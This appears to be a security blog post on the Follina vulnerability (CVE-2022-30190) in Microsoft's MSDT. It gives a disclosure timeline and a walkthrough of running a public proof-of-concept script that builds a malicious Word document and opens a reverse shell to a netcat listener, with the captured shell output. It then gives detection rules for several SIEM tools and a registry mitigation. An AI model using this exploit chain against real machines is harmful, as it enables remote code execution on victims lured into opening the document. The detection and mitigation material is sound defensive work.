Reproducing the CVE-2022-30190 using the sample POC along with detection and mitigations
This will be a post on how to exploit the new Microsoft 0-day known as CVE-2022-30190.
If you want to have a technical read on this refer the following resource.
Timeline
April 12th 2022 — First report to Microsoft MSRC, by leader of Shadowchasing1, an APT hunting group. This document is an in the wild, real world exploit targeting Russia, themed as a Russian job interview.
April 21st 2022 — Microsoft MSRC closed the ticket saying not a security related issue (for the record, msdt executing with macros disabled is an issue)
May ?? 2022 — Microsoft may have tried to fix this or accidentally fixed it in Office 365 Insider channel, without documenting a CVE or writing it down anywhere. The other products remain vulnerable.
May 27th 2022 — Security vendor Nao tweet a document uploaded from Belarus, which is also an in the wild attack.
May 27th 2022 — Reported back to MSRC.
May 29th 2022 — Andy Ful identified this was a zero day publicly as it still works against Office 365 Semi Annual channel, and ‘on prem’ Office versions and EDR products are failing to detect.
The to get a shell first run the script that will start a listener.
root@kali ~/msdt-follina (main)# python3 follina.py -r 9001
[+] copied staging doc /tmp/r1yug4g9
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
[+] starting 'nc -lvnp 9001'
listening on [any] 9001 ...
Now in the exploit directory there is a follina.doc, transfer it to the windows 10 target machine. In the real world scenario the doc can be send via email or social engineered the victim into downloading the doc via the attacker external DNS server.
Now after this step, open the word document.
Click on enable editing.
This will load up the 'Troubleshooter', check back the listener.
root@kali ~/msdt-follina (main)# python3 follina.py -r 9001
[+] copied staging doc /tmp/r1yug4g9
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
[+] starting 'nc -lvnp 9001'
listening on [any] 9001 ...
connect to [192.168.1.2] from (UNKNOWN) [192.168.1.5] 63142
Microsoft Windows [Version 10.0.22000.593]
(c) Microsoft Corporation. All rights reserved.
C:\Users\User\AppData\Local\Temp\SDIAG_b2c85456-72f5-4c24-9728-d72bc16950d8>whoami
whoami
windev2204eval\user
title: ms-msdt for RCE CVE-2022-30190
description: Detecting the execution of weaponized maldoc or embedded link in outlook that uses ms-msdt scheme to execute code.
status: experimental
references:
- https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190
- https://twitter.com/nao_sec/status/1530196847679401984
- https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e
- https://twitter.com/secforce_ltd/status/1531987722293886978?s=21&t=f6-tesTzFEhR7TSoyTtp8Q
author: '@Kostastsale'
date: 2022/05/29
logsource:
category: process_creation
product: windows
detection:
selection1:
Image|endswith:
- '\msdt.exe'
CommandLine|contains|all:
- 'msdt'
- '/id'
selection2:
CommandLine|contains|all:
- 'IT_BrowseForFile'
- 'IT_LaunchMethod'
selection3:
CommandLine|contains|all:
- '/af'
- '.xml'
condition: selection1 and (selection2 or selection3)
falsepositives:
- Uknown
level: high
tags:
- attack.execution
- attack.T1059.003
- attack.T1204.002
Now listing all the detection rules for the SOC tools
Microsoft Defender
DeviceProcessEvents | where ((ProcessCommandLine contains "WINWORD.EXE") and (ProcessCommandLine contains "msdt.exe") and (ProcessCommandLine contains "sdiagnhost.exe" or ProcessCommandLine contains "csc.exe" or ProcessCommandLine contains "PCWDiagnostic" or ProcessCommandLine contains "IT_ReBrowserForFile" or ProcessCommandLine contains "IT_BrowserForFile" or ProcessCommandLine contains "conhost.exe"))
Splunk
[Doc Malware]
alert.severity = 2
description = Detection (Rule ID: 74566a6a66aaasdq2ed)
cron_schedule = 0 * * * *
disabled = 1
is_scheduled = 1
is_visible = 1
dispatch.earliest_time = -60m@m
dispatch.latest_time = now
search = (source="WinEventLog:*" AND (CommandLine="*WINWORD.EXE*") AND (CommandLine="*msdt.exe*") AND (CommandLine="*sdiagnhost.exe*" OR CommandLine="*csc.exe*" OR CommandLine="*PCWDiagnostic*" OR CommandLine="*IT_ReBrowserForFile*" OR CommandLine="*IT_BrowserForFile*" OR CommandLine="*conhost.exe*"))
alert.suppress = 0
alert.track = 1
Qradar
SELECT UTF8(payload) from events where LOGSOURCETYPENAME(devicetype)='Microsoft Windows Security Event Log' and ("Process CommandLine" ilike '%WINWORD.EXE%') and ("Process CommandLine" ilike '%msdt.exe%') and ("Process CommandLine" ilike '%sdiagnhost.exe%' or "Process CommandLine" ilike '%csc.exe%' or "Process CommandLine" ilike '%PCWDiagnostic%' or "Process CommandLine" ilike '%IT_ReBrowserForFile%' or "Process CommandLine" ilike '%IT_BrowserForFile%' or "Process CommandLine" ilike '%conhost.exe%')
GrayLog
(CommandLine.keyword:*WINWORD.EXE* AND CommandLine.keyword:*msdt.exe* AND CommandLine.keyword:(*sdiagnhost.exe* *csc.exe* *PCWDiagnostic* *IT_ReBrowserForFile* *IT_BrowserForFile* *conhost.exe*))
Sumologic
(_sourceCategory=*windows* AND (CommandLine = "*WINWORD.EXE*") AND (CommandLine = "*msdt.exe*") AND (CommandLine = "*sdiagnhost.exe*" OR CommandLine = "*csc.exe*" OR CommandLine = "*PCWDiagnostic*" OR CommandLine = "*IT_ReBrowserForFile*" OR CommandLine = "*IT_BrowserForFile*" OR CommandLine = "*conhost.exe*"))
Elastic KQL
(process.command_line:*WINWORD.EXE* AND process.command_line:*msdt.exe* AND process.command_line:(*sdiagnhost.exe* OR *csc.exe* OR *PCWDiagnostic* OR *IT_ReBrowserForFile* OR *IT_BrowserForFile* OR *conhost.exe*))
Elastic EQL
process where event.type in ("start" , "process_created") and (process.pe.original_file_name : "msdt.exe" or process.name : "msdt.exe") and (process.parent.pe.original_file_name : ("winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe") or process.parent.name : ("winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"))
#Detects the exploitation of Follina Microsoft Code Execution vulnerability
SecurityEvent
| where EventID==4688
| where ParentProcessName has_any ('winword.exe','excel.exe','outlook.exe')
| where NewProcessName contains "msdt.exe" or CommandLine contains "msdt.exe"
| project TimeGenerated, NewProcessId, NewProcessName, ParentProcessName, CommandLine, EventID, Activity, Computer
#The below query could return false-positives please verify the output and modify the query according to your environment.
SecurityEvent
| where EventID==4688
| where ParentProcessName has_any ('sdiagnhost.exe', 'msdt.exe')
//| where NewProcessName contains "powershell" or NewProcessname contains "cmd.exe" //optional: you can include this line for directly finding powershell or cmd process spawns
| project TimeGenerated, NewProcessId, NewProcessName, ParentProcessName, CommandLine, EventID, Activity, Computer
Mitigations
Removing the protocol handler for ms-msdt is likely the safest mitigation vector until there’s an official response from Microsoft. We have not tested this method in large enterprises, so there may be some secondary effects of widely disabling the protocol handler. However, considering the implications of successful exploitation (arbitrary code execution), this seems like a reasonable risk-based approach (at least on any systems where Office documents are opened). Removing the protocol handler is as simple as executing the following command in an elevated command prompt. Note that you should back up contents of this key before deleting contents so it can be merged back into the registry once a patch is available
reg delete HKEY_CLASSES_ROOT\ms-msdt /f
You can use below PS script to achieve the registry modification. Credite to Kelvin Tegelaar
What makes this attack dangerous ? This attacks do not requires you to click on 'Enable Content' that attackers abuse to deliver malicious Macros. Also community is already aware of the dangers of macros.
This attack only requires you to click on 'Enable Editing' that is for the protected view, which make be tweak a more to make it a 0-click attack vector